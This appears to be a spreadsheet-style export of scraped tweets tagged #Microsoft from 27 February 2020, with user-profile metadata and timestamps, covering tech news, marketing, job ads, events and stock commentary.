    <t>{'id': 701411095, 'id_str': '701411095', 'name': 'Market Realist', 'screen_name': 'MarketRealist', 'location': 'New York, NY', 'description': 'Keeping up with the markets? Stay informed with our stock, commodity, and macro analysis.', 'url': 'https://t.co/xs6UsfVE3P', 'entities': {'url': {'urls': [{'url': 'https://t.co/xs6UsfVE3P', 'expanded_url': 'http://www.marketrealist.com', 'display_url': 'marketrealist.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 5545, 'friends_count': 2478, 'listed_count': 170, 'created_at': 'Tue Jul 17 17:08:00 +0000 2012', 'favourites_count': 1853, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 24893, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '039049', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/991032097728073728/1TGljtFO_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991032097728073728/1TGljtFO_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/701411095/1524691344', 'profile_link_color': '1B95E0',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</si>
  <si>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13:51:40 +0000 2020</t>
  </si>
  <si>
    <t>Where does your company rank when it comes to #workplacesatisfaction? Learn what really makes employees happy. More, via @:ChannelE2E   #Microsoft #Technology #BusinessAutomation #accounting #MSDyn365 https://t.co/5o00pU62RI</t>
  </si>
  <si>
    <t>{'id': 569497576, 'id_str': '569497576', 'name': 'richard barclay', 'screen_name': 'rsbarclay', 'location': 'Chicago, IL', 'description': 'â€œAll progress takes place outside the comfort zone." -- Michael John Bobak', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 46, 'friends_count': 204, 'listed_count': 1, 'created_at': 'Wed May 02 23:01:15 +0000 2012', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 227,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'http://pbs.twimg.com/profile_images/496365274526793728/WZm7s1yS_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/496365274526793728/WZm7s1yS_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/569497576/1407354962',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</si>
  <si>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13:48:49 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft Outlook for #Android gains annotation feature for photos and... https://t.co/VwX0MibEb8</t>
  </si>
  <si>
    <t>Thu Feb 27 13:48:48 +0000 2020</t>
  </si>
  <si>
    <t>Looks like it may be another rough day for the markets. Check out our Opening Bell analysis. #Investing #StockMarket #StockMarketNews #StockstoWatch #NYSE #Trading #Stocks #Finance #Microsoft https://t.co/lSCcc27WxV</t>
  </si>
  <si>
    <t>{'id': 989878361924268032, 'id_str': '989878361924268032', 'name': 'Money and Markets', 'screen_name': 'TheMoneyMarkets', 'location': 'Florida, USA', 'description': 'Unbiased financial news, commentary and actionable advice. Sign up for our Money and Markets newsletter #Investing #Money #StockMarketNews #Economy #Retirement', 'url': 'https://t.co/qGhImp53eV', 'entities': {'url': {'urls': [{'url': 'https://t.co/qGhImp53eV', 'expanded_url': 'https://moneyandmarkets.com/', 'display_url': 'moneyandmarkets.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 248, 'friends_count': 244, 'listed_count': 0, 'created_at': 'Fri Apr 27 14:46:07 +0000 2018', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1061, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/991399729832562688/GyZbnxut_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/991399729832562688/GyZbnxut_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/989878361924268032/1525203167',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</si>
  <si>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13:47:01 +0000 2020</t>
  </si>
  <si>
    <t>#Windows10 update issues continue to plague #Microsoft, with the OS giant pulling a security fix earlier this month. Experts like @holgermu and @FORRahewitt call for more testing and oversight for the update process https://t.co/Ot6tRmcvLz</t>
  </si>
  <si>
    <t>{'id': 1176653502, 'id_str': '1176653502', 'name': 'sEnterpriseDesktop', 'screen_name': 'EntDesktopTT', 'location': '', 'description': 'SearchEnterpriseDesktop is TechTargetâ€™s desktop management resource, covering Windows operating systems, Microsoft Office, Internet Explorer and more.', 'url': 'https://t.co/jkrJZ1YD5v', 'entities': {'url': {'urls': [{'url': 'https://t.co/jkrJZ1YD5v', 'expanded_url': 'https://searchenterprisedesktop.techtarget.com/', 'display_url': 'searchenterprisedesktop.techtarget.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 655, 'friends_count': 194, 'listed_count': 32, 'created_at': 'Wed Feb 13 19:49:37 +0000 2013', 'favourites_count': 445, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3556,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'http://pbs.twimg.com/profile_images/941352759802122240/KS-vs_I-_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/941352759802122240/KS-vs_I-_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1176653502/1513270980', 'profile_link_color': '00B3AD',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</si>
  <si>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13:45:11 +0000 2020</t>
  </si>
  <si>
    <t>Last Chance to get #TheDivision2 for only $3 !!!  Grab it while you can, price available until March 3rd.
.
.
.
Tags:
#support #RarityGames #gaming #games #nerd #nerdlife #Gamer4life #gamerlife #sony #microsoft... https://t.co/g0Dwoy04wR</t>
  </si>
  <si>
    <t>Thu Feb 27 13:43:48 +0000 2020</t>
  </si>
  <si>
    <t>You can now solve business problems for your frontline workers and enhance customer-centricity!
Become a part of App in a Day in Berlin.
#Visionet #Microsoft #AppInADay #AIAD #PowerPlatform https://t.co/E2H2EEdk09</t>
  </si>
  <si>
    <t>Thu Feb 27 13:38:10 +0000 2020</t>
  </si>
  <si>
    <t>We are hiring an Internal IT Support #Engineer to join our global operations. A good understanding of server, network, storage and #Microsoft applications is essential. To find out more and apply for this role. Visit our careers page. | https://t.co/RvnOIdrKbN #TeamGCI #ITjobs https://t.co/8E37Uod7Pn</t>
  </si>
  <si>
    <t>{'id': 473827699, 'id_str': '473827699', 'name': 'GCI', 'screen_name': 'GCI_Com', 'location': 'UK', 'description': 'Leading UK ICT Services Provider with an end-to-end portfolio. Supporting organisations on their journey through digital transformation to digital business.', 'url': 'http://t.co/yFUYVZLY76', 'entities': {'url': {'urls': [{'url': 'http://t.co/yFUYVZLY76', 'expanded_url': 'http://www.gcicom.net', 'display_url': 'gcicom.net', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1719, 'friends_count': 1470, 'listed_count': 59, 'created_at': 'Wed Jan 25 11:15:45 +0000 2012', 'favourites_count': 1362, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4237,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'http://pbs.twimg.com/profile_images/876794799017390081/15keUU-J_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/876794799017390081/15keUU-J_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/473827699/1522754063', 'profile_link_color': '0086C7',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</si>
  <si>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Feb 27 13:37:18 +0000 2020</t>
  </si>
  <si>
    <t>Developing on AWS
Know More;
https://t.co/Pq9hYdtqRw
#aws,#cloudcomputing,#devops,#azure,#it,#amazon,#amazonwebservices,#database,#innovation,#bigdata,#cloud,#datascience,#developer,#TheManMusicVideo,#microsoft,#technology,#BTSComebackSpecial,#ThursdayMotivation,#itim, 
#google https://t.co/JzAiH5GUl6</t>
  </si>
  <si>
    <t>Thu Feb 27 13:33:59 +0000 2020</t>
  </si>
  <si>
    <t>Registrations Open for the Mar 2020 API Webcast
https://t.co/eXNvqQUs1B 
#webinar #microsoft #community #API #azure #issquared #online #free #cloud #technology https://t.co/f2hf0FUq94</t>
  </si>
  <si>
    <t>Thu Feb 27 13:31:34 +0000 2020</t>
  </si>
  <si>
    <t>#Graduate with a #degree &amp;amp; a work #portfolio. With Xcelerator, our learning &amp;amp; placement platform, create customized project portfolios that lead to work opportunities at companies like #Amazon, #IBM, #Microsoft, etc. Apply today https://t.co/Z5auEGnQrx https://t.co/4A5hBDLlIn</t>
  </si>
  <si>
    <t>{'id': 1162025073319874561, 'id_str': '1162025073319874561', 'name': 'Atria University', 'screen_name': 'atriauniversity', 'location': 'Bengaluru', 'description': 'Reengineering education for an empowered future | Founding Batch August 2020 | Admissions Open', 'url': 'https://t.co/Lcc1PUz3Nr', 'entities': {'url': {'urls': [{'url': 'https://t.co/Lcc1PUz3Nr', 'expanded_url': 'http://www.atriauniversity.org', 'display_url': 'atriauniversity.org', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14, 'friends_count': 15, 'listed_count': 0, 'created_at': 'Thu Aug 15 15:35:41 +0000 2019', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True,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'http://pbs.twimg.com/profile_images/1178986684601360384/PnDPrdlV_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1178986684601360384/PnDPrdlV_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1162025073319874561/1582100257',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</si>
  <si>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13:30:21 +0000 2020</t>
  </si>
  <si>
    <t>As a Microsoft Learning Partner, we are able to provide official Microsoft courses that can help expand your skills, whether youre trying something totally knew or just want to grow skills you already have!
#risualeducation #apprenticeships #microsoft #microsoftpartner https://t.co/cWSXYPGueJ</t>
  </si>
  <si>
    <t>{'id': 3431288638, 'id_str': '3431288638', 'name': 'risual Education', 'screen_name': 'risualEducation', 'location': 'Stafford, England', 'description': 'risual Education works with partners across the UK to develop digital skills and offer digital apprenticeships delivered by industry and academic experts.', 'url': 'https://t.co/CL4fUT2wYj', 'entities': {'url': {'urls': [{'url': 'https://t.co/CL4fUT2wYj', 'expanded_url': 'http://www.risual.com/education/', 'display_url': 'risual.com/education/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 683, 'friends_count': 1492, 'listed_count': 9, 'created_at': 'Wed Aug 19 08:53:17 +0000 2015', 'favourites_count': 1610, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3452,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'http://pbs.twimg.com/profile_images/818419642100228096/hRYqM7Ge_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/818419642100228096/hRYqM7Ge_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/3431288638/1485535703', 'profile_link_color': 'BED62F',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</si>
  <si>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13:30:00 +0000 2020</t>
  </si>
  <si>
    <t>Top 10 things to know in tech 27/02/20 according to @businessinsider Tech Reporter @Hamilbug Interesting mix of info #SoftBank #Microsoft #coronavirus #stole #House #Tesla #ClearviewAI #facialrecognition #Salesforce #etsy #Amazon #Facebook #sanzaru 
https://t.co/sDqTvccwmh</t>
  </si>
  <si>
    <t>Thu Feb 27 13:28:16 +0000 2020</t>
  </si>
  <si>
    <t>Giving 4 months time period is not enough at all to announce that all your MCSA/E line is going to get retired. This is disappointing and discouraging for people who are already studying for MCSA, unless #Microsoft has better plan for us. Please push the deadline back! #MCSA</t>
  </si>
  <si>
    <t>{'id': 314721643, 'id_str': '314721643', 'name': 'Rezhwan', 'screen_name': 'Rezhww', 'location': 'Kurdistan', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 90, 'friends_count': 89, 'listed_count': 1, 'created_at': 'Fri Jun 10 18:09:44 +0000 2011', 'favourites_count': 789, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 385, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '66FFF7', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme11/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1002204193292193792/ZBV4hzpQ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1002204193292193792/ZBV4hzpQ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/314721643/1527103912', 'profile_link_color': '7FDBB6', 'profile_sidebar_border_color': '120D0F', 'profile_sidebar_fill_color': '36262B', 'profile_text_color': 'F582ED', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 13:25:19 +0000 2020</t>
  </si>
  <si>
    <t>Thanks to all who attended our 'Insight To Microsoft Teams' event in Richmond today! Thank you also to our presenters, Kieran Robinson from #Microsoft, Jonathan Clark from #Poly, and Terry Doherty. https://t.co/FN62el6j9o</t>
  </si>
  <si>
    <t>{'id': 47592919, 'id_str': '47592919', 'name': 'Doherty Associates', 'screen_name': 'ITSupportUK', 'location': 'Richmond, London', 'description': 'Award Winning 24/7 #Tech &amp; #Cloud solutions for businesses globally. #Microsoft Gold Partner. 25+ years experience. HQ #Richmond, #London', 'url': 'https://t.co/0MPEceMRwE', 'entities': {'url': {'urls': [{'url': 'https://t.co/0MPEceMRwE', 'expanded_url': 'http://www.doherty.co.uk/', 'display_url': 'doherty.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 2818, 'friends_count': 2538, 'listed_count': 73, 'created_at': 'Tue Jun 16 10:24:51 +0000 2009', 'favourites_count': 2774, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 3796,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'http://pbs.twimg.com/profile_images/933262974726291457/0RtkFYaz_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933262974726291457/0RtkFYaz_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47592919/1528466658', 'profile_link_color': '005FB3', 'profile_sidebar_border_color': 'BDDCAD', 'profile_sidebar_fill_color': 'CFE8FC', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 13:23:28 +0000 2020</t>
  </si>
  <si>
    <t>@tracyvds sharing her 7 min am routine - checking #Microsoft news on Twitter via these handles and reminding herself about #Ubuntu #MSigniteTheTour  https://t.co/hdMsgSioKz</t>
  </si>
  <si>
    <t>{'id': 334676553, 'id_str': '334676553', 'name': 'Allie Wieczorek #MSIgniteTheTour ðŸ‡¨ðŸ‡¿ðŸ‡©ðŸ‡°', 'screen_name': 'alliewiz13', 'location': 'Seattle, WA', 'description': '@Microsoft PMM for M365 and Office Apps &amp; Services MVP Program #MVPBuzz #CommunityRocks', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 532, 'friends_count': 951, 'listed_count': 8, 'created_at': 'Wed Jul 13 13:57:16 +0000 2011', 'favourites_count': 1132, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 207,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'http://pbs.twimg.com/profile_images/1231531961182801920/tvtP8J35_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1231531961182801920/tvtP8J35_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/334676553/1573018444',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</si>
  <si>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13:21:51 +0000 2020</t>
  </si>
  <si>
    <t>SMBs are hungry for #tech that brings customer data together and helps drive #DigitalTransformation.     #Microsoft #Technology #BusinessAutomation #MSDyn365 https://t.co/9omswVSrR6</t>
  </si>
  <si>
    <t>{'id': 727528487607787521, 'id_str': '727528487607787521', 'name': 'SYNACT', 'screen_name': 'synact_crm', 'location': 'Rochester, NY', 'description': '', 'url': 'https://t.co/fTBwoRavZZ', 'entities': {'url': {'urls': [{'url': 'https://t.co/fTBwoRavZZ', 'expanded_url': 'http://www.synact.net', 'display_url': 'synact.net', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 36, 'friends_count': 120, 'listed_count': 1, 'created_at': 'Tue May 03 16:01:23 +0000 2016', 'favourites_count': 140, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 448, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/727529389899046912/WvhNDxFM_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/727529389899046912/WvhNDxFM_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/727528487607787521/1462291539',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</si>
  <si>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13:19:24 +0000 2020</t>
  </si>
  <si>
    <t xml:space="preserve">Dear @only_office, your @Nextclouders-enabled online office is great but we cannot use it because all our documents need to be saved as #ODF rather than #Microsoft files by default.
When will this be implemented? </t>
  </si>
  <si>
    <t>{'id': 2831626181, 'id_str': '2831626181', 'name': 'Jan Penfrat', 'screen_name': 'ilumium', 'location': 'Brussels, Belgium', 'description': 'Policy guy @edri. Co-founder and digital security trainer @TrainingPrivacy. Ex-@Golem. Apparently I like Sushi recipes. PGP: https://t.co/KLHjQEvzrS', 'url': 'https://t.co/r9Ic2sab3P', 'entities': {'url': {'urls': [{'url': 'https://t.co/r9Ic2sab3P', 'expanded_url': 'https://biketheworld.blog', 'display_url': 'biketheworld.blog', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/KLHjQEvzrS', 'expanded_url': 'http://keybase.io/janweisensee', 'display_url': 'keybase.io/janweisensee', 'indices': [125, 148]}]}}, 'protected': False, 'followers_count': 443, 'friends_count': 405, 'listed_count': 39, 'created_at': 'Wed Oct 15 13:53:58 +0000 2014', 'favourites_count': 137, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2410,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'http://pbs.twimg.com/profile_images/693846799212224516/R2Mekn9C_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/693846799212224516/R2Mekn9C_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2831626181/1458125116',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</si>
  <si>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13:15:15 +0000 2020</t>
  </si>
  <si>
    <t>Twitter videos show off Microsoft's Surface Duo 'peek' feature - https://t.co/ZnJZsCwTC1
#Microsoft #Twitter #surfaceDuo #KnowledgeIsPower #Technology #newstuff #Knowledge #news #tech #technews #checkitout #mustwatch #cnet</t>
  </si>
  <si>
    <t>{'id': 184043964, 'id_str': '184043964', 'name': 'Quentin Smith', 'screen_name': 'QZSmith', 'location': 'Avon, Indiana ', 'description': 'Christian âž• Child ðŸ§’ðŸ½ of God ðŸ™ðŸ½ \nHusband ðŸ‘‘ to @TinaBookerâ™• \nFather ðŸ§”ðŸ½\nNupe ðŸ‘ŒðŸ½\nMe â™“\n#FamilyFirst\n\nPOSITIVE MOTIVATE INSPIRE', 'url': 'https://t.co/JdRjzp1viP', 'entities': {'url': {'urls': [{'url': 'https://t.co/JdRjzp1viP', 'expanded_url': 'http://www.linkedin.com/pub/quentin-smith/17/585/a9a/', 'display_url': 'linkedin.com/pub/quentin-smâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1031, 'friends_count': 961, 'listed_count': 282, 'created_at': 'Sat Aug 28 15:05:13 +0000 2010', 'favourites_count': 410, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 27272,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'http://pbs.twimg.com/profile_images/378800000591638224/1084d025925b9a082ba4754661cda634_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000591638224/1084d025925b9a082ba4754661cda634_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/184043964/1381693835',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</si>
  <si>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Feb 27 13:15:14 +0000 2020</t>
  </si>
  <si>
    <t>Twitter videos show off Microsoft's Surface Duo 'peek' feature - https://t.co/U7k9DOcFcG
#Microsoft #Twitter #surfaceDuo #KnowledgeIsPower #Technology #newstuff #Knowledge #news #tech #technews #checkitout #mustwatch #cnet</t>
  </si>
  <si>
    <t>{'id': 69526040, 'id_str': '69526040', 'name': 'Q', 'screen_name': 'KaratDiamond', 'location': 'Kappa Land', 'description': 'Christian âž• Child ðŸ§’ðŸ½ of God ðŸ™ðŸ½ \nHusband ðŸ‘‘ to @TinaBooker â™• \nFather ðŸ§”ðŸ½\nNupe ðŸ‘ŒðŸ½\nMe â™“\n#FamilyFirst\n\nLOYALTY PATIENCE UNDERSTANDING', 'url': 'https://t.co/nSLJaFRwQr', 'entities': {'url': {'urls': [{'url': 'https://t.co/nSLJaFRwQr', 'expanded_url': 'http://www.instagram.com/karatdiamond', 'display_url': 'instagram.com/karatdiamond', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3045, 'friends_count': 2578, 'listed_count': 1154, 'created_at': 'Fri Aug 28 06:47:26 +0000 2009', 'favourites_count': 1092, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 85875,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'http://pbs.twimg.com/profile_images/378800000591740367/a3fbced55fc7eafd155f0a54b6b8fe73_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/378800000591740367/a3fbced55fc7eafd155f0a54b6b8fe73_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/69526040/1381695746', 'profile_link_color': '990000', 'profile_sidebar_border_color': 'DFDFDF', 'profile_sidebar_fill_color': 'F3F3F3', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Thu Feb 27 13:15:12 +0000 2020</t>
  </si>
  <si>
    <t>BlueVoyant offers managed detection and response for #Microsoft Defender Advanced Threat Protection https://t.co/cNyM5cTZ3K #HelpNetSecurity</t>
  </si>
  <si>
    <t>Thu Feb 27 13:15:09 +0000 2020</t>
  </si>
  <si>
    <t>#microsoft billionaire Charles Simonyi still goes to work https://t.co/rpjomgT0pt https://t.co/D8YW4cP527</t>
  </si>
  <si>
    <t>Thu Feb 27 13:15:00 +0000 2020</t>
  </si>
  <si>
    <t>Optimus and Ingenuity Technologies in Tech Talks @ Kingston Jamaica
#Optimus #Business #Transformation #BeaGuru #DigitalTransformation #Office365 #PowerBi #Azure #Microsoft #Software #LinkedInTT #Caribbean #Intcomex #Jamaica #Kingston #BizTech #Dynamics365 #Summit2019 #Canalys https://t.co/COtj38m7hU</t>
  </si>
  <si>
    <t>Thu Feb 27 13:14:42 +0000 2020</t>
  </si>
  <si>
    <t>Register now for the free #Azure #Hybrid Virtual Event - with Julia White (@julwhite) #microsoft https://t.co/4MU0SO4gIQ</t>
  </si>
  <si>
    <t>Thu Feb 27 13:14:23 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft looking to invest in Indonesian data centres #Microsoft #Indonesia https://t.co/54KfVkuids https://t.co/to9ZSmRQ1c</t>
  </si>
  <si>
    <t>Thu Feb 27 13:13:03 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft (MSFT)  Microsoft said it did not expect to meet prior guidance for its personal computing segment, due to supply chain disruptions related to the #coronavirus #outbreak.</t>
  </si>
  <si>
    <t>{'id': 263302066, 'id_str': '263302066', 'name': 'Kybalion', 'screen_name': 'DeAndreHibbler', 'location': 'Memphis', 'description': 'Mirror the things you wish to become. |PHA|', 'url': 'https://t.co/RWxjMRol4v', 'entities': {'url': {'urls': [{'url': 'https://t.co/RWxjMRol4v', 'expanded_url': 'https://www.facebook.com/deandrehibbler/', 'display_url': 'facebook.com/deandrehibbler/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1638, 'friends_count': 1838, 'listed_count': 13, 'created_at': 'Wed Mar 09 19:52:06 +0000 2011', 'favourites_count': 277, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 36669,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'http://pbs.twimg.com/profile_images/1232277164776706048/uSt1f9jd_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1232277164776706048/uSt1f9jd_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/263302066/1582632746', 'profile_link_color': '4A913C',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'regular'}</t>
  </si>
  <si>
    <t>Thu Feb 27 13:12:42 +0000 2020</t>
  </si>
  <si>
    <t>With Azure Sphere, Microsoft has taken the lead in building an end-to-end connected platform spanning the MCU to the cloud. #Microsoft #AzureSphere #IoT #Innovation https://t.co/OKePPRIncG</t>
  </si>
  <si>
    <t>{'id': 773849570275160064, 'id_str': '773849570275160064', 'name': 'Galen Hunt', 'screen_name': 'galen_hunt', 'location': 'Bellevue, WA', 'description': 'Distinguished Engineer and Managing Director, Microsoft Azure Sphere. Determined husband and father. Practicing bishop.', 'url': 'https://t.co/FA6wuoLfG0', 'entities': {'url': {'urls': [{'url': 'https://t.co/FA6wuoLfG0', 'expanded_url': 'https://www.microsoft.com/en-us/research/people/galenh/', 'display_url': 'microsoft.com/en-us/researchâ€¦', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 410, 'friends_count': 68, 'listed_count': 6, 'created_at': 'Thu Sep 08 11:44:50 +0000 2016', 'favourites_count': 8, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 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'http://pbs.twimg.com/profile_images/1042477684771643392/HKaG8EVy_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1042477684771643392/HKaG8EVy_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/773849570275160064/1537380925',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</si>
  <si>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13:11:13 +0000 2020</t>
  </si>
  <si>
    <t>Two ways to open up new lines of communication for your business: 1. Deploy #Microsoft #Teams across your organization as the hub for teamwork in #Office365. 2. Subscribe now to this channel. Enable your digital workspace by doing both. https://t.co/UH7eP9z1Y6</t>
  </si>
  <si>
    <t>Thu Feb 27 13:11:05 +0000 2020</t>
  </si>
  <si>
    <t>IR35 private sector reforms: Treasury review concludes no delay needed to April 2020 start date https://t.co/Yy6kSUS8d9 via @Hybrid_Circle #Cisco #Microsoft</t>
  </si>
  <si>
    <t>Thu Feb 27 13:09:08 +0000 2020</t>
  </si>
  <si>
    <t>#stocks making the biggest moves in the premarket: Best Buy, #Microsoft $MSFT, #ETSY $ETSY, Box, Square $SQ &amp;amp; more https://t.co/VQwEznAxNi https://t.co/IOjhQ0pBuH</t>
  </si>
  <si>
    <t>Thu Feb 27 13:08:31 +0000 2020</t>
  </si>
  <si>
    <t>Want to build fast, reliable, and flexible applications? That's what @Azure does best. #Microsoft https://t.co/OzuwdYNAyl</t>
  </si>
  <si>
    <t>Thu Feb 27 13:08:22 +0000 2020</t>
  </si>
  <si>
    <t>today from #stockholm #sweden
Had a great #coffee time and #chat today with Christer Ogenstad from #novatrox at our #microsoft office and discussed some #AI cases using #computervision and real #impact by the solution. 
Looking forward to do more #togethe...https://t.co/G1KI5JGnpy</t>
  </si>
  <si>
    <t>Thu Feb 27 13:07:52 +0000 2020</t>
  </si>
  <si>
    <t>Future betting on Software than Hardware.. Hardware dependent companies come and go but software stays #Microsoft #Google #Apple #Samsung</t>
  </si>
  <si>
    <t>{'id': 195689137, 'id_str': '195689137', 'name': 'Adeeb Al-Dabt', 'screen_name': 'aaldabt', 'location': 'Kuwait', 'description': '', 'url': 'https://t.co/KDwPvCq8Xs', 'entities': {'url': {'urls': [{'url': 'https://t.co/KDwPvCq8Xs', 'expanded_url': 'http://ADBG.me', 'display_url': 'ADBG.me', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 117, 'friends_count': 361, 'listed_count': 8, 'created_at': 'Mon Sep 27 10:22:21 +0000 2010', 'favourites_count': 253, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1793,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'http://pbs.twimg.com/profile_images/1053611550358097920/qw4hxzcP_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1053611550358097920/qw4hxzcP_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/195689137/1538126965',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</si>
  <si>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13:06:52 +0000 2020</t>
  </si>
  <si>
    <t>Build a data analytics solution with #Microsoft #PowerPlatform today and create the foundation for tomorrow's end-to-end data analytics. Subscribe now to see how. https://t.co/Lu686g87PS</t>
  </si>
  <si>
    <t>Thu Feb 27 13:06:25 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact Alliance IT, LLC for access to #Microsoft #Office365 advanced threat protection. https://t.co/gXRFz6bKxF</t>
  </si>
  <si>
    <t>Thu Feb 27 13:06:14 +0000 2020</t>
  </si>
  <si>
    <t>If you value your data, you want the highest performing data platform on the market. #1 in price and performance with massive scale, #Microsoft @SQLServer 2017 is the ultimate data platform. https://t.co/a6i48Pv5LH</t>
  </si>
  <si>
    <t>Thu Feb 27 13:05:17 +0000 2020</t>
  </si>
  <si>
